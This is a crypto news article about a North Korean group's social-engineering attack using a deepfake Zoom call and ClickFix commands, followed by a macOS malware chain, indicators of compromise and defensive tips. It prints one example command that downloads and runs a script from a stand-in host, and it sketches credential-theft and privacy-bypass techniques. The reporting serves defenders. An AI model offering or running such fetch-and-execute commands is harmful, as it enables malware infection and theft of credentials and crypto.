How North Korean Hackers Use AI Deepfakes and New Mac Malware to Steal Crypto

North Korean hackers are getting smarter. They now use AI deepfakes, fake Zoom calls, and fresh malware to target crypto firms and steal digital assets. A recent attack on a FinTech company in the crypto space shows their new tricks. This group, called , dropped seven malware tools on one Mac device to grab credentials, browser data, and session tokens. All this to drain crypto wallets and hit DeFi platforms.

If you work in crypto, blockchain, or Web3, this is a wake-up call. These attacks mix old social tricks with new AI and malware. Learn how they work, what tools they use, and how to stay safe.

Who Are and Why Target Crypto?

is a money-hungry hacking group linked to North Korea. Active since 2018, they shifted focus in 2023 from banks to crypto. They hit startups, developers, exchanges, and VC firms. In 2025, they targeted payments, staking, wallets, and brokerage services.

Crypto is perfect for them. Wallets hold big money with few checks. One stolen session token can empty accounts. This attack used tons of tools on one person’s Mac, showing they want max data for theft and more scams.

• Main Targets: Crypto exchanges (CEX), DeFi devs, VC execs.
• Goal: Steal keys, cookies, creds for wallet drains.
• New Twist: AI for deepfake videos and image edits.

The Sneaky Social Engineering Attack

The hack started on Telegram. Hackers took over an exec’s account from a crypto firm. They messaged the victim, built trust, then sent a Calendly link for a meeting. It led to a fake Zoom at zoom[.]uswe05[.]us.

In the call, a deepfake video of another CEO appeared. Victim thought it was real. Then, fake audio issues led to a ClickFix trick. Hackers gave “troubleshooting” commands. One hid malware download.

Mac commands looked like this (simplified):

curl -o /tmp/script.sh http://evil-site/payload.sh && chmod +x /tmp/script.sh && /tmp/script.sh

Windows had similar ones. Victim ran them, starting the infection.

This mix of compromised chats, fake meetings, AI fakes, and command tricks is new. uses AI like Gemini for research and lures, per threat reports.

The Malware Chain: Seven Tools Unleashed

Once inside, malware chain exploded. No EDR? No problem. Mac’s XProtect logged behaviors, helping map the attack.

1. AppleScript: First runner, dropped WAVESHAPER backdoor.
2. WAVESHAPER: C++ backdoor. Packs payloads, beacons system info (UID, boot time, processes). Runs as daemon, downloads more via curl to C2.
3. HYPERCALL: Go downloader. Grabs libs from RC4-encrypted config at /Library/SystemSettings/.CacheLogs.db. Reflectively loads them. Used three times:

• Loads HIDDENCALL backdoor for keyboard access.
• Drops SUGARLOADER.
• Runs SILENCELIFT toehold.

HIDDENCALL: Go backdoor, linked to HYPERCALL by code shares (t_ functions, Rosetta AOT files).

SUGARLOADER: Old UNC1069 loader. RC4 config at /Library/OSRecovery/com.apple.os.config. Drops CHROMEPUSH. Gets LaunchDaemon persistence.

SILENCELIFT: Tiny C++ backdoor. Beacons to support-zoom[.]us from /Library/Caches/.Logs.db. Disrupts Telegram if root.

DEEPBREATH: Swift data thief. Hacks TCC.db for full disk access via Finder. Steals Keychain creds, Chrome/Brave/Edge data, Telegram, Notes. Zips and curls out.

CHROMEPUSH: C++ miner. Fake Chrome/Brave extension (“Google Docs offline”). Native host persistence. Logs keys, grabs cookies, screenshots. Uploads to cmailer[.]pro.

Deep Dive: DEEPBREATH Bypasses Mac Privacy

DEEPBREATH is slick. It tricks Finder (with Full Disk Access) to stage TCC.db, injects perms for Desktop/Downloads, restores it. No user prompts. Then grabs all sensitive files.

CHROMEPUSH: Browser Spy Master

Poses as docs editor. Sets native messaging at ~/Library/Application Support/Google/Chrome/NativeMessagingHosts/. JSON config for keylog, cookies, caps. Data to subdirs like “c” for Chrome.

Key Indicators of Compromise (IOCs)

Hunt these to spot :

• Hashes: b452C2da7c012eda25a1403b3313444b5eb7C2c3e25eee489f1bd256f8434735, 1a30d6cdb0b98feed62563be8050db55ae0156ed437701d36a7b46aabf086ede
• Paths: /Library/LaunchDaemons/com.apple.system.updater.plist, /Library/Caches/System Settings, /Users/*/Library/Application Support/Google/Chrome/NativeMessagingHosts/Google Chrome Docs
• C2: zoom[.]uswe05[.]us, support-zoom[.]us, cmailer[.]pro

Tools like Google SecOps flag: TCC manip, Chrome native mods, Keychain access.

Why Crypto is at Risk and How to Fight Back

Crypto pros use Macs, Telegram, Zoom daily. Personal devices link to corp nets. Stolen data fuels more attacks.

Prevention Tips for Crypto Teams

• Verify Contacts: Check Telegram warnings. Use video ID or second channel.
• Never Run Commands: From calls. Use VMs for tests.
• Enable EDR: Like CrowdStrike, SentinelOne on Macs.
• Lock Browsers: Extension blocks, cookie mgmt.
• AI Checks: Tools to spot deepfakes (lip sync, blinks).
• 2FA/MFA: Hardware keys for wallets.
• Monitor: TCC changes, weird LaunchDaemons, NativeMessagingHosts.

Train staff on ClickFix. Use passwordless logins where possible.

What’s Next for and Crypto Security?

These hackers evolve fast. From phishing to AI lures. Expect more Mac tools, cross-OS attacks. Crypto must up defenses: zero-trust, AI detection, fast IR.

Stay alert. One click can cost millions in BTC/ETH. Share IOCs, patch quick, train hard.

Protect your blockchain projects. The future of DeFi depends on it.

Discuss this news on our Telegram Community. Subscribe to us on Google news and do follow us on Twitter @Blockmanity

Did you like the news you just read? Please leave a feedback to help us serve you better

Disclaimer: Blockmanity is a news portal and does not provide any financial advice. Blockmanity's role is to inform the cryptocurrency and blockchain community about what's going on in this space. Please do your own due diligence before making any investment. Blockmanity won't be responsible for any loss of funds.